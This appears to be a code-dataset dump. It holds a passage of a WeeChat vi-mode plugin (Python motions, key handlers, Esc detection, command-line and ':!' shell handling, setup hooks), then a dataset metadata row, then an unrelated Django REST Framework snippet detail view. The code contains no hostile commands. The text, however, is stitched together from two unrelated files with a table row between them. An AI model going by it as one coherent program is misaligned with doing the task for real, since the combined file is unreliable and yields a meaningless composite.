pos = get_pos(input_line[::-1], REGEX_MOTION_G_UPPERCASE_E, new_cur,
True, count)
if pos == -1:
return 0, False, False
pos = len(input_line) - (pos + new_cur + 1)
return pos, True, False
def motion_h(input_line, cur, count):
"""Go `count` characters to the left and return position.
See Also:
`motion_base()`.
"""
return max(0, cur - max(count, 1)), False, False
def motion_l(input_line, cur, count):
"""Go `count` characters to the right and return position.
See Also:
`motion_base()`.
"""
return cur + max(count, 1), False, False
def motion_carret(input_line, cur, count):
"""Go to first non-blank character of line and return position.
See Also:
`motion_base()`.
"""
pos = get_pos(input_line, REGEX_MOTION_CARRET, 0)
return pos, False, False
def motion_dollar(input_line, cur, count):
"""Go to end of line and return position.
See Also:
`motion_base()`.
"""
pos = len(input_line)
return pos, False, False
def motion_f(input_line, cur, count):
"""Go to `count`'th occurence of character and return position.
See Also:
`motion_base()`.
"""
return start_catching_keys(1, "cb_motion_f", input_line, cur, count)
def cb_motion_f(update_last=True):
"""Callback for `motion_f()`.
Args:
update_last (bool, optional): should `last_search_motion` be updated?
Set to False when calling from `key_semicolon()` or `key_comma()`
so that the last search motion isn't overwritten.
Defaults to True.
See Also:
`start_catching_keys()`.
"""
global last_search_motion
pattern = catching_keys_data['keys']
pos = get_pos(catching_keys_data['input_line'], re.escape(pattern),
catching_keys_data['cur'], True,
catching_keys_data['count'])
catching_keys_data['new_cur'] = max(0, pos) + catching_keys_data['cur']
if update_last:
last_search_motion = {'motion': "f", 'data': pattern}
cb_key_combo_default(None, None, "")
def motion_F(input_line, cur, count):
"""Go to `count`'th occurence of char to the right and return position.
See Also:
`motion_base()`.
"""
return start_catching_keys(1, "cb_motion_F", input_line, cur, count)
def cb_motion_F(update_last=True):
"""Callback for `motion_F()`.
Args:
update_last (bool, optional): should `last_search_motion` be updated?
Set to False when calling from `key_semicolon()` or `key_comma()`
so that the last search motion isn't overwritten.
Defaults to True.
See Also:
`start_catching_keys()`.
"""
global last_search_motion
pattern = catching_keys_data['keys']
cur = len(catching_keys_data['input_line']) - catching_keys_data['cur']
pos = get_pos(catching_keys_data['input_line'][::-1],
re.escape(pattern),
cur,
False,
catching_keys_data['count'])
catching_keys_data['new_cur'] = catching_keys_data['cur'] - max(0, pos + 1)
if update_last:
last_search_motion = {'motion': "F", 'data': pattern}
cb_key_combo_default(None, None, "")
def motion_t(input_line, cur, count):
"""Go to `count`'th occurence of char and return position.
The position returned is the position of the character to the left of char.
See Also:
`motion_base()`.
"""
return start_catching_keys(1, "cb_motion_t", input_line, cur, count)
def cb_motion_t(update_last=True):
"""Callback for `motion_t()`.
Args:
update_last (bool, optional): should `last_search_motion` be updated?
Set to False when calling from `key_semicolon()` or `key_comma()`
so that the last search motion isn't overwritten.
Defaults to True.
See Also:
`start_catching_keys()`.
"""
global last_search_motion
pattern = catching_keys_data['keys']
pos = get_pos(catching_keys_data['input_line'], re.escape(pattern),
catching_keys_data['cur'] + 1,
True, catching_keys_data['count'])
pos += 1
if pos > 0:
catching_keys_data['new_cur'] = pos + catching_keys_data['cur'] - 1
else:
catching_keys_data['new_cur'] = catching_keys_data['cur']
if update_last:
last_search_motion = {'motion': "t", 'data': pattern}
cb_key_combo_default(None, None, "")
def motion_T(input_line, cur, count):
"""Go to `count`'th occurence of char to the left and return position.
The position returned is the position of the character to the right of
char.
See Also:
`motion_base()`.
"""
return start_catching_keys(1, "cb_motion_T", input_line, cur, count)
def cb_motion_T(update_last=True):
"""Callback for `motion_T()`.
Args:
update_last (bool, optional): should `last_search_motion` be updated?
Set to False when calling from `key_semicolon()` or `key_comma()`
so that the last search motion isn't overwritten.
Defaults to True.
See Also:
`start_catching_keys()`.
"""
global last_search_motion
pattern = catching_keys_data['keys']
pos = get_pos(catching_keys_data['input_line'][::-1], re.escape(pattern),
(len(catching_keys_data['input_line']) -
(catching_keys_data['cur'] + 1)) + 1,
True, catching_keys_data['count'])
pos += 1
if pos > 0:
catching_keys_data['new_cur'] = catching_keys_data['cur'] - pos + 1
else:
catching_keys_data['new_cur'] = catching_keys_data['cur']
if update_last:
last_search_motion = {'motion': "T", 'data': pattern}
cb_key_combo_default(None, None, "")
# Keys:
# -----
def key_cc(buf, input_line, cur, count):
"""Delete line and start Insert mode.
See Also:
`key_base()`.
"""
weechat.command("", "/input delete_line")
set_mode("INSERT")
def key_C(buf, input_line, cur, count):
"""Delete from cursor to end of line and start Insert mode.
See Also:
`key_base()`.
"""
weechat.command("", "/input delete_end_of_line")
set_mode("INSERT")
def key_yy(buf, input_line, cur, count):
"""Yank line.
See Also:
`key_base()`.
"""
proc = subprocess.Popen(["xclip", "-selection", "c"],
stdin=subprocess.PIPE)
proc.communicate(input=input_line)
def key_i(buf, input_line, cur, count):
"""Start Insert mode.
See Also:
`key_base()`.
"""
set_mode("INSERT")
def key_a(buf, input_line, cur, count):
"""Move cursor one character to the right and start Insert mode.
See Also:
`key_base()`.
"""
set_cur(buf, input_line, cur + 1, False)
set_mode("INSERT")
def key_A(buf, input_line, cur, count):
"""Move cursor to end of line and start Insert mode.
See Also:
`key_base()`.
"""
set_cur(buf, input_line, len(input_line), False)
set_mode("INSERT")
def key_I(buf, input_line, cur, count):
"""Move cursor to first non-blank character and start Insert mode.
See Also:
`key_base()`.
"""
pos, _, _ = motion_carret(input_line, cur, 0)
set_cur(buf, input_line, pos)
set_mode("INSERT")
def key_G(buf, input_line, cur, count):
"""Scroll to specified line or bottom of buffer.
See Also:
`key_base()`.
"""
if count > 0:
# This is necessary to prevent weird scroll jumps.
weechat.command("", "/window scroll_top")
weechat.command("", "/window scroll %s" % (count - 1))
else:
weechat.command("", "/window scroll_bottom")
def key_r(buf, input_line, cur, count):
"""Replace `count` characters under the cursor.
See Also:
`key_base()`.
"""
start_catching_keys(1, "cb_key_r", input_line, cur, count, buf)
def cb_key_r():
"""Callback for `key_r()`.
See Also:
`start_catching_keys()`.
"""
global catching_keys_data
input_line = list(catching_keys_data['input_line'])
count = max(catching_keys_data['count'], 1)
cur = catching_keys_data['cur']
if cur + count <= len(input_line):
for _ in range(count):
input_line[cur] = catching_keys_data['keys']
cur += 1
input_line = "".join(input_line)
weechat.buffer_set(catching_keys_data['buf'], "input", input_line)
set_cur(catching_keys_data['buf'], input_line, cur - 1)
catching_keys_data = {'amount': 0}
def key_R(buf, input_line, cur, count):
"""Start Replace mode.
See Also:
`key_base()`.
"""
set_mode("REPLACE")
def key_tilda(buf, input_line, cur, count):
"""Switch the case of `count` characters under the cursor.
See Also:
`key_base()`.
"""
input_line = list(input_line)
count = max(1, count)
while count and cur < len(input_line):
input_line[cur] = input_line[cur].swapcase()
count -= 1
cur += 1
input_line = "".join(input_line)
weechat.buffer_set(buf, "input", input_line)
set_cur(buf, input_line, cur)
def key_alt_j(buf, input_line, cur, count):
"""Go to WeeChat buffer.
Called to preserve WeeChat's alt-j buffer switching.
This is only called when alt-j<num> is pressed after pressing Esc, because
\x01\x01j is received in key_combo_default which becomes \x01j after
removing the detected Esc key.
If Esc isn't the last pressed key, \x01j<num> is directly received in
key_combo_default.
"""
start_catching_keys(2, "cb_key_alt_j", input_line, cur, count)
def cb_key_alt_j():
"""Callback for `key_alt_j()`.
See Also:
`start_catching_keys()`.
"""
global catching_keys_data
weechat.command("", "/buffer " + catching_keys_data['keys'])
catching_keys_data = {'amount': 0}
def key_semicolon(buf, input_line, cur, count, swap=False):
"""Repeat last f, t, F, T `count` times.
Args:
swap (bool, optional): if True, the last motion will be repeated in the
opposite direction (e.g. "f" instead of "F"). Defaults to False.
See Also:
`key_base()`.
"""
global catching_keys_data, vi_buffer
catching_keys_data = ({'amount': 0,
'input_line': input_line,
'cur': cur,
'keys': last_search_motion['data'],
'count': count,
'new_cur': 0,
'buf': buf})
# Swap the motion's case if called from key_comma.
if swap:
motion = last_search_motion['motion'].swapcase()
else:
motion = last_search_motion['motion']
func = "cb_motion_%s" % motion
vi_buffer = motion
globals()[func](False)
def key_comma(buf, input_line, cur, count):
"""Repeat last f, t, F, T in opposite direction `count` times.
See Also:
`key_base()`.
"""
key_semicolon(buf, input_line, cur, count, True)
# Vi key bindings.
# ================
# String values will be executed as normal WeeChat commands.
# For functions, see `key_base()` for reference.
VI_KEYS = {'j': "/window scroll_down",
'k': "/window scroll_up",
'G': key_G,
'gg': "/window scroll_top",
'x': "/input delete_next_char",
'X': "/input delete_previous_char",
'dd': "/input delete_line",
'D': "/input delete_end_of_line",
'cc': key_cc,
'C': key_C,
'i': key_i,
'a': key_a,
'A': key_A,
'I': key_I,
'yy': key_yy,
'p': "/input clipboard_paste",
'/': "/input search_text",
'gt': "/buffer +1",
'K': "/buffer +1",
'gT': "/buffer -1",
'J': "/buffer -1",
'r': key_r,
'R': key_R,
'~': key_tilda,
'\x01[[A': "/input history_previous",
'\x01[[B': "/input history_next",
'\x01[[C': "/input move_next_char",
'\x01[[D': "/input move_previous_char",
'\x01[[H': "/input move_beginning_of_line",
'\x01[[F': "/input move_end_of_line",
'\x01[[5~': "/window page_up",
'\x01[[6~': "/window page_down",
'\x01[[3~': "/input delete_next_char",
'\x01[[2~': key_i,
'\x01M': "/input return",
'\x01?': "/input move_previous_char",
' ': "/input move_next_char",
'\x01[j': key_alt_j,
'\x01[1': "/buffer *1",
'\x01[2': "/buffer *2",
'\x01[3': "/buffer *3",
'\x01[4': "/buffer *4",
'\x01[5': "/buffer *5",
'\x01[6': "/buffer *6",
'\x01[7': "/buffer *7",
'\x01[8': "/buffer *8",
'\x01[9': "/buffer *9",
'\x01[0': "/buffer *10",
'\x01^': "/input jump_last_buffer_displayed",
'\x01D': "/window page_down",
'\x01U': "/window page_up",
'\x01Wh': "/window left",
'\x01Wj': "/window down",
'\x01Wk': "/window up",
'\x01Wl': "/window right",
'\x01W=': "/window balance",
'\x01Wx': "/window swap",
'\x01Ws': "/window splith",
'\x01Wv': "/window splitv",
'\x01Wq': "/window merge",
';': key_semicolon,
',': key_comma}
# Add alt-j<number> bindings.
for i in range(10, 99):
VI_KEYS['\x01[j%s' % i] = "/buffer %s" % i
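# (binds alt-j10 through alt-j98 to the matching buffer numbers)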
# Key handling.
# =============
def cb_key_pressed(data, signal, signal_data):
"""Detect potential Esc presses.
Alt and Esc are detected as the same key in most terminals. The difference
is that the Alt signal is sent just before the other pressed key's signal.
We therefore use a timeout (50ms) to detect whether Alt or Esc was pressed.
"""
global last_signal_time
last_signal_time = time.time()
if signal_data == "\x01[":
# In 50ms, check if any other keys were pressed. If not, it's Esc!
weechat.hook_timer(50, 0, 1, "cb_check_esc",
"{:f}".format(last_signal_time))
return weechat.WEECHAT_RC_OK
def cb_check_esc(data, remaining_calls):
"""Check if the Esc key was pressed and change the mode accordingly."""
global esc_pressed, vi_buffer, cmd_text, catching_keys_data
if last_signal_time == float(data):
esc_pressed += 1
set_mode("NORMAL")
# Cancel any current partial commands.
vi_buffer = ""
cmd_text = ""
weechat.command("", "/bar hide vi_cmd")
catching_keys_data = {'amount': 0}
weechat.bar_item_update("vi_buffer")
return weechat.WEECHAT_RC_OK
def cb_key_combo_default(data, signal, signal_data):
"""Eat and handle key events when in Normal mode, if needed.
The key_combo_default signal is sent when a key combo is pressed. For
example, alt-k will send the "\x01[k" signal.
Esc is handled a bit differently to avoid delays, see `cb_key_pressed()`.
"""
global esc_pressed, vi_buffer, cmd_text
# If Esc was pressed, strip the Esc part from the pressed keys.
# Example: user presses Esc followed by i. This is detected as "\x01[i",
# but we only want to handle "i".
keys = signal_data
if esc_pressed or esc_pressed == -2:
if keys.startswith("\x01[" * esc_pressed):
# Multiples of 3 seem to "cancel" themselves,
# e.g. Esc-Esc-Esc-Alt-j-11 is detected as "\x01[\x01[\x01"
# followed by "\x01[j11" (two different signals).
if signal_data == "\x01[" * 3:
esc_pressed = -1 # `cb_check_esc()` will increment it to 0.
else:
esc_pressed = 0
# This can happen if a valid combination is started but interrupted
# with Esc, such as Ctrl-W→Esc→w which would send two signals:
# "\x01W\x01[" then "\x01W\x01[w".
# In that case, we still need to handle the next signal ("\x01W\x01[w")
# so we use the special value "-2".
else:
esc_pressed = -2
keys = keys.split("\x01[")[-1] # Remove the "Esc" part(s).
# Ctrl-Space.
elif keys == "\x01@":
set_mode("NORMAL")
return weechat.WEECHAT_RC_OK_EAT
# Nothing to do here.
if mode == "INSERT":
return weechat.WEECHAT_RC_OK
# We're in Replace mode — allow "normal" key presses (e.g. "a") and
# overwrite the next character with them, but let the other key presses
# pass normally (e.g. backspace, arrow keys, etc).
if mode == "REPLACE":
if len(keys) == 1:
weechat.command("", "/input delete_next_char")
elif keys == "\x01?":
weechat.command("", "/input move_previous_char")
return weechat.WEECHAT_RC_OK_EAT
return weechat.WEECHAT_RC_OK
# We're catching keys! Only "normal" key presses interest us (e.g. "a"),
# not complex ones (e.g. backspace).
if len(keys) == 1 and catching_keys_data['amount']:
catching_keys_data['keys'] += keys
catching_keys_data['amount'] -= 1
# Done catching keys, execute the callback.
if catching_keys_data['amount'] == 0:
globals()[catching_keys_data['callback']]()
vi_buffer = ""
weechat.bar_item_update("vi_buffer")
return weechat.WEECHAT_RC_OK_EAT
# We're in command-line mode.
if cmd_text:
# Backspace key.
if keys == "\x01?":
# Remove the last character from our command line.
cmd_text = list(cmd_text)
del cmd_text[-1]
cmd_text = "".join(cmd_text)
# Return key.
elif keys == "\x01M":
weechat.hook_timer(1, 0, 1, "cb_exec_cmd", cmd_text)
cmd_text = ""
# Input.
elif len(keys) == 1:
cmd_text += keys
# Update (and maybe hide) the bar item.
weechat.bar_item_update("cmd_text")
if not cmd_text:
weechat.command("", "/bar hide vi_cmd")
return weechat.WEECHAT_RC_OK_EAT
# Enter command mode.
elif keys == ":":
cmd_text += ":"
weechat.command("", "/bar show vi_cmd")
weechat.bar_item_update("cmd_text")
return weechat.WEECHAT_RC_OK_EAT
# Add key to the buffer.
vi_buffer += keys
weechat.bar_item_update("vi_buffer")
if not vi_buffer:
return weechat.WEECHAT_RC_OK
# Check if the keys have a (partial or full) match. If so, also get the
# keys without the count. (These are the actual keys we should handle.)
# After that, `vi_buffer` is only used for display purposes — only
# `vi_keys` is checked for all the handling.
# If no matches are found, the keys buffer is cleared.
matched, vi_keys, count = get_keys_and_count(vi_buffer)
if not matched:
vi_buffer = ""
return weechat.WEECHAT_RC_OK_EAT
buf = weechat.current_buffer()
input_line = weechat.buffer_get_string(buf, "input")
cur = weechat.buffer_get_integer(buf, "input_pos")
# It's a key. If the corresponding value is a string, we assume it's a
# WeeChat command. Otherwise, it's a method we'll call.
if vi_keys in VI_KEYS:
if isinstance(VI_KEYS[vi_keys], str):
for _ in range(max(count, 1)):
# This is to avoid crashing WeeChat on script reloads/unloads,
# because no hooks must still be running when a script is
# reloaded or unloaded.
if VI_KEYS[vi_keys] == "/input return":
return weechat.WEECHAT_RC_OK
weechat.command("", VI_KEYS[vi_keys])
current_cur = weechat.buffer_get_integer(buf, "input_pos")
set_cur(buf, input_line, current_cur)
else:
VI_KEYS[vi_keys](buf, input_line, cur, count)
# It's a motion (e.g. "w") — call `motion_X()` where X is the motion, then
# set the cursor's position to what that function returned.
elif vi_keys in VI_MOTIONS:
if vi_keys in SPECIAL_CHARS:
func = "motion_%s" % SPECIAL_CHARS[vi_keys]
else:
func = "motion_%s" % vi_keys
end, _, _ = globals()[func](input_line, cur, count)
set_cur(buf, input_line, end)
# It's an operator + motion (e.g. "dw") — call `motion_X()` (where X is
# the motion), then we call `operator_Y()` (where Y is the operator)
# with the position `motion_X()` returned. `operator_Y()` should then
# handle changing the input line.
elif (len(vi_keys) > 1 and
vi_keys[0] in VI_OPERATORS and
vi_keys[1:] in VI_MOTIONS):
if vi_keys[1:] in SPECIAL_CHARS:
func = "motion_%s" % SPECIAL_CHARS[vi_keys[1:]]
else:
func = "motion_%s" % vi_keys[1:]
pos, overwrite, catching = globals()[func](input_line, cur, count)
# If it's a catching motion, we don't want to call the operator just
# yet -- this code will run again when the motion is complete, at which
# point we will.
if not catching:
oper = "operator_%s" % vi_keys[0]
globals()[oper](buf, input_line, cur, pos, overwrite)
# The combo isn't completed yet (e.g. just "d").
else:
return weechat.WEECHAT_RC_OK_EAT
# We've already handled the key combo, so clear the keys buffer.
if not catching_keys_data['amount']:
vi_buffer = ""
weechat.bar_item_update("vi_buffer")
return weechat.WEECHAT_RC_OK_EAT
# Callbacks.
# ==========
# Bar items.
# ----------
def cb_vi_buffer(data, item, window):
"""Return the content of the vi buffer (pressed keys on hold)."""
return vi_buffer
def cb_cmd_text(data, item, window):
"""Return the text of the command line."""
return cmd_text
def cb_mode_indicator(data, item, window):
"""Return the current mode (INSERT/NORMAL/REPLACE)."""
return mode
def cb_line_numbers(data, item, window):
"""Fill the line numbers bar item."""
bar_height = weechat.window_get_integer(window, "win_chat_height")
content = ""
for i in range(1, bar_height + 1):
content += "%s \n" % i
return content
# Callbacks for the line numbers bar.
# ...................................
def cb_update_line_numbers(data, signal, signal_data):
"""Call `cb_timer_update_line_numbers()` when switching buffers.
A timer is required because the bar item is refreshed before the new buffer
is actually displayed, so ``win_chat_height`` would refer to the old
buffer. Using a timer refreshes the item after the new buffer is displayed.
"""
weechat.hook_timer(10, 0, 1, "cb_timer_update_line_numbers", "")
return weechat.WEECHAT_RC_OK
def cb_timer_update_line_numbers(data, remaining_calls):
"""Update the line numbers bar item."""
weechat.bar_item_update("line_numbers")
return weechat.WEECHAT_RC_OK
# Config.
# -------
def cb_config(data, option, value):
"""Script option changed, update our copy."""
option_name = option.split(".")[-1]
if option_name in vimode_settings:
vimode_settings[option_name] = value
return weechat.WEECHAT_RC_OK
# Command-line execution.
# -----------------------
def cb_exec_cmd(data, remaining_calls):
"""Translate and execute our custom commands to WeeChat command."""
# Process the entered command.
data = list(data)
del data[0]
data = "".join(data)
# s/foo/bar command.
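# Example: ":s/foo/bar" replaces the first "foo" in the input line with
# "bar"; adding the "g" flag (":s/foo/bar/g") replaces every occurrence.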
if data.startswith("s/"):
cmd = data
parsed_cmd = next(csv.reader(StringIO(cmd), delimiter="/",
escapechar="\\"))
pattern = re.escape(parsed_cmd[1])
repl = parsed_cmd[2]
repl = re.sub(r"([^\\])&", r"\1" + pattern, repl)
flag = None
if len(parsed_cmd) == 4:
flag = parsed_cmd[3]
count = 1
if flag == "g":
count = 0
buf = weechat.current_buffer()
input_line = weechat.buffer_get_string(buf, "input")
input_line = re.sub(pattern, repl, input_line, count)
weechat.buffer_set(buf, "input", input_line)
# Shell command.
elif data.startswith("!"):
weechat.command("", "/exec -buffer shell %s" % data[1:])
# Commands like `:22`. This should start cursor mode (``/cursor``) and take
# us to the relevant line.
# TODO: look into possible replacement key bindings for: ← ↑ → ↓ Q m q.
elif data.isdigit():
line_number = int(data)
hdata_window = weechat.hdata_get("window")
window = weechat.current_window()
x = weechat.hdata_integer(hdata_window, window, "win_chat_x")
y = (weechat.hdata_integer(hdata_window, window, "win_chat_y") +
(line_number - 1))
weechat.command("", "/cursor go {},{}".format(x, y))
# Check against defined commands.
else:
data = data.split(" ", 1)
cmd = data[0]
args = ""
if len(data) == 2:
args = data[1]
if cmd in VI_COMMANDS:
weechat.command("", "%s %s" % (VI_COMMANDS[cmd], args))
# No vi commands defined, run the command as a WeeChat command.
else:
weechat.command("", "/{} {}".format(cmd, args))
return weechat.WEECHAT_RC_OK
# Script commands.
# ----------------
def cb_vimode_cmd(data, buf, args):
"""Handle script commands (``/vimode <command>``)."""
# ``/vimode`` or ``/vimode help``
if not args or args == "help":
weechat.prnt("", "[vimode.py] %s" % README_URL)
# ``/vimode bind_keys`` or ``/vimode bind_keys --list``
elif args.startswith("bind_keys"):
infolist = weechat.infolist_get("key", "", "default")
weechat.infolist_reset_item_cursor(infolist)
commands = ["/key unbind ctrl-W",
"/key bind ctrl-W /input delete_previous_word",
"/key bind ctrl-^ /input jump_last_buffer_displayed",
"/key bind ctrl-Wh /window left",
"/key bind ctrl-Wj /window down",
"/key bind ctrl-Wk /window up",
"/key bind ctrl-Wl /window right",
"/key bind ctrl-W= /window balance",
"/key bind ctrl-Wx /window swap",
"/key bind ctrl-Ws /window splith",
"/key bind ctrl-Wv /window splitv",
"/key bind ctrl-Wq /window merge"]
while weechat.infolist_next(infolist):
key = weechat.infolist_string(infolist, "key")
if re.match(REGEX_PROBLEMATIC_KEYBINDINGS, key):
commands.append("/key unbind %s" % key)
if args == "bind_keys":
weechat.prnt("", "Running commands:")
for command in commands:
weechat.command("", command)
weechat.prnt("", "Done.")
elif args == "bind_keys --list":
weechat.prnt("", "Listing commands we'll run:")
for command in commands:
weechat.prnt("", " %s" % command)
weechat.prnt("", "Done.")
return weechat.WEECHAT_RC_OK
# Helpers.
# ========
# Motions/keys helpers.
# ---------------------
def get_pos(data, regex, cur, ignore_cur=False, count=0):
"""Return the position of `regex` match in `data`, starting at `cur`.
Args:
data (str): the data to search in.
regex (pattern): regex pattern to search for.
cur (int): where to start the search.
ignore_cur (bool, optional): should the first match be ignored if it's
also the character at `cur`?
Defaults to False.
count (int, optional): the index of the match to return. Defaults to 0.
Returns:
int: position of the match. -1 if no matches are found.
"""
# List of the *positions* of the found patterns.
matches = [m.start() for m in re.finditer(regex, data[cur:])]
pos = -1
if count:
if len(matches) > count - 1:
if ignore_cur and matches[0] == 0:
if len(matches) > count:
pos = matches[count]
else:
pos = matches[count - 1]
elif matches:
if ignore_cur and matches[0] == 0:
if len(matches) > 1:
pos = matches[1]
else:
pos = matches[0]
return pos
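# Example: get_pos("hello world", "o", 0) returns 4, while
# get_pos("hello world", "o", 5) returns 2 -- the offset is always
# relative to `cur`, not to the start of the string.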
def set_cur(buf, input_line, pos, cap=True):
"""Set the cursor's position.
Args:
buf (str): pointer to the current WeeChat buffer.
input_line (str): the content of the input line.
pos (int): the position to set the cursor to.
cap (bool, optional): if True, the `pos` will shortened to the length
of `input_line` if it's too long. Defaults to True.
"""
if cap:
pos = min(pos, len(input_line) - 1)
weechat.buffer_set(buf, "input_pos", str(pos))
def start_catching_keys(amount, callback, input_line, cur, count, buf=None):
"""Start catching keys. Used for special commands (e.g. "f", "r").
amount (int): amount of keys to catch.
callback (str): name of method to call once all keys are caught.
input_line (str): input line's content.
cur (int): cursor's position.
count (int): count, e.g. "2" for "2fs".
buf (str, optional): pointer to the current WeeChat buffer.
Defaults to None.
`catching_keys_data` is a dict with the above arguments, as well as:
keys (str): pressed keys will be added under this key.
new_cur (int): the new cursor's position, set in the callback.
When catching keys is active, normal pressed keys (e.g. "a" but not arrows)
will get added to `catching_keys_data` under the key "keys", and will not
be handled any further.
Once all keys are caught, the method defined in the "callback" key is
called, and can use the data in `catching_keys_data` to perform its action.
"""
global catching_keys_data
if "new_cur" in catching_keys_data:
new_cur = catching_keys_data['new_cur']
catching_keys_data = {'amount': 0}
return new_cur, True, False
catching_keys_data = ({'amount': amount,
'callback': callback,
'input_line': input_line,
'cur': cur,
'keys': "",
'count': count,
'new_cur': 0,
'buf': buf})
return cur, False, True
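# Example flow: pressing "f" calls start_catching_keys(1, "cb_motion_f", ...),
# the next key (say "x") is stored in catching_keys_data['keys'], and
# cb_motion_f() then moves the cursor to that character.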
def get_keys_and_count(combo):
"""Check if `combo` is a valid combo and extract keys/counts if so.
Args:
combo (str): pressed keys combo.
Returns:
matched (bool): True if the combo has a (partial or full) match, False
otherwise.
combo (str): `combo` with the count removed. These are the actual keys
we should handle.
count (int): count for `combo`.
"""
# Look for a potential match (e.g. "d" might become "dw" or "dd" so we
# accept it, but "d9" is invalid).
matched = False
# Digits are allowed at the beginning (counts or "0").
count = 0
if combo.isdigit():
matched = True
elif combo and combo[0].isdigit():
count = ""
for char in combo:
if char.isdigit():
count += char
else:
break
combo = combo.replace(count, "", 1)
count = int(count)
# Check against defined keys.
if not matched:
for key in VI_KEYS:
if key.startswith(combo):
matched = True
break
# Check against defined motions.
if not matched:
for motion in VI_MOTIONS:
if motion.startswith(combo):
matched = True
break
# Check against defined operators + motions.
if not matched:
for operator in VI_OPERATORS:
if combo.startswith(operator):
# Check for counts before the motion (but after the operator).
vi_keys_no_op = combo[len(operator):]
# There's no motion yet.
if vi_keys_no_op.isdigit():
matched = True
break
# Get the motion count, then multiply the operator count by
# it, similar to vim's behavior.
elif vi_keys_no_op and vi_keys_no_op[0].isdigit():
motion_count = ""
for char in vi_keys_no_op:
if char.isdigit():
motion_count += char
else:
break
# Remove counts from `vi_keys_no_op`.
combo = combo.replace(motion_count, "", 1)
motion_count = int(motion_count)
count = max(count, 1) * motion_count
# Check against defined motions.
for motion in VI_MOTIONS:
if motion.startswith(combo[1:]):
matched = True
break
return matched, combo, count
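# Example: get_keys_and_count("2dw") -> (True, "dw", 2); counts before the
# motion multiply, so "d2w" also yields (True, "dw", 2).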
# Other helpers.
# --------------
def set_mode(arg):
"""Set the current mode and update the bar mode indicator."""
global mode
mode = arg
# If we're going to Normal mode, the cursor must move one character to the
# left.
if mode == "NORMAL":
buf = weechat.current_buffer()
input_line = weechat.buffer_get_string(buf, "input")
cur = weechat.buffer_get_integer(buf, "input_pos")
set_cur(buf, input_line, cur - 1, False)
weechat.bar_item_update("mode_indicator")
def print_warning(text):
"""Print warning, in red, to the current buffer."""
weechat.prnt("", ("%s[vimode.py] %s" % (weechat.color("red"), text)))
def check_warnings():
"""Warn the user about problematic key bindings and tmux/screen."""
user_warned = False
# Warn the user about problematic key bindings that may conflict with
# vimode.
# The solution is to remove these key bindings, but that's up to the user.
infolist = weechat.infolist_get("key", "", "default")
problematic_keybindings = []
while weechat.infolist_next(infolist):
key = weechat.infolist_string(infolist, "key")
command = weechat.infolist_string(infolist, "command")
if re.match(REGEX_PROBLEMATIC_KEYBINDINGS, key):
problematic_keybindings.append("%s -> %s" % (key, command))
if problematic_keybindings:
user_warned = True
print_warning("Problematic keybindings detected:")
for keybinding in problematic_keybindings:
print_warning(" %s" % keybinding)
print_warning("These keybindings may conflict with vimode.")
print_warning("You can remove problematic key bindings and add"
" recommended ones by using /vimode bind_keys, or only"
" list them with /vimode bind_keys --list")
print_warning("For help, see: %s" % FAQ_KEYBINDINGS)
del problematic_keybindings
# Warn tmux/screen users about possible Esc detection delays.
if "STY" in os.environ or "TMUX" in os.environ:
if user_warned:
weechat.prnt("", "")
user_warned = True
print_warning("tmux/screen users, see: %s" % FAQ_ESC)
if (user_warned and not
weechat.config_string_to_boolean(vimode_settings['no_warn'])):
weechat.prnt("", "")
print_warning("To force disable warnings, you can set"
" plugins.var.python.vimode.no_warn to 'on'")
# Main script.
# ============
if __name__ == "__main__":
weechat.register(SCRIPT_NAME, SCRIPT_AUTHOR, SCRIPT_VERSION,
SCRIPT_LICENSE, SCRIPT_DESC, "", "")
# Warn the user if he's using an unsupported WeeChat version.
VERSION = weechat.info_get("version_number", "")
if int(VERSION) < 0x01000000:
print_warning("Please upgrade to WeeChat ≥ 1.0.0. Previous versions"
" are not supported.")
# Set up script options.
for option, value in vimode_settings.items():
if weechat.config_is_set_plugin(option):
vimode_settings[option] = weechat.config_get_plugin(option)
else:
weechat.config_set_plugin(option, value[0])
vimode_settings[option] = value[0]
weechat.config_set_desc_plugin(option,
"%s (default: \"%s\")" % (value[1],
value[0]))
# Warn the user about possible problems if necessary.
if not weechat.config_string_to_boolean(vimode_settings['no_warn']):
check_warnings()
# Create bar items and setup hooks.
weechat.bar_item_new("mode_indicator", "cb_mode_indicator", "")
weechat.bar_item_new("cmd_text", "cb_cmd_text", "")
weechat.bar_item_new("vi_buffer", "cb_vi_buffer", "")
weechat.bar_item_new("line_numbers", "cb_line_numbers", "")
weechat.bar_new("vi_cmd", "off", "0", "root", "", "bottom", "vertical",
"vertical", "0", "0", "default", "default", "default", "0",
"cmd_text")
weechat.bar_new("vi_line_numbers", "on", "0", "window", "", "left",
"vertical", "vertical", "0", "0", "default", "default",
"default", "0", "line_numbers")
weechat.hook_config("plugins.var.python.%s.*" % SCRIPT_NAME, "cb_config",
"")
weechat.hook_signal("key_pressed", "cb_key_pressed", "")
weechat.hook_signal("key_combo_default", "cb_key_combo_default", "")
weechat.hook_signal("buffer_switch", "cb_update_line_numbers", "")
weechat.hook_command("vimode", SCRIPT_DESC, "[help | bind_keys [--list]]",
" help: show help\n"
"bind_keys: unbind problematic keys, and bind"
" recommended keys to use in WeeChat\n"
" --list: only list changes",
"help || bind_keys |--list",
"cb_vimode_cmd", "")
| mit | 6,677,825,719,635,397,000 | 34.017289 | 79 | 0.56929 | false | 3.530294 | false | false | false |
sinner/testing-djrf | tutorial/snippets/views/SnippetDetail.py | 1 | 1959 | from snippets.models import Snippet
from snippets.serializers import SnippetSerializer
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
class SnippetDetail(APIView):
"""
Retrieve, update or delete a snippet instance.
"""
def get_object(self, pk):
try:
return Snippet.objects.get(pk=pk)
except Snippet.DoesNotExist:
raise Http404
def get(self, request, pk, format=None):
snippet = self.get_object(pk)
serializer = SnippetSerializer(snippet)
return Response({
'message': 'The snippet has been found successfully.',
'data': serializer.data,
'error': False,
'errorDetails': None
})
def put(self, request, pk, format=None):
snippet = self.get_object(pk)
serializer = SnippetSerializer(snippet, data=request.data)
if serializer.is_valid():
serializer.save()
return Response({
'message': 'The snippet has been updated successfully.',
'data': serializer.data,
'error': False,
'errorDetails': None
})
return Response({
'message': 'There are one or more errors in the data sent.',
'data': request.data,
'error': True,
'errorDetails': serializer.errors
}, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, pk, format=None):
snippet = self.get_object(pk)
serializer = SnippetSerializer(snippet)
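# Serialize before deleting so the response body can still echo the data.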
snippet.delete()
return Response({
'message': 'The snippet has been deleted successfully.',
'data': serializer.data,
'error': False,
'errorDetails': None
}, status=status.HTTP_204_NO_CONTENT)
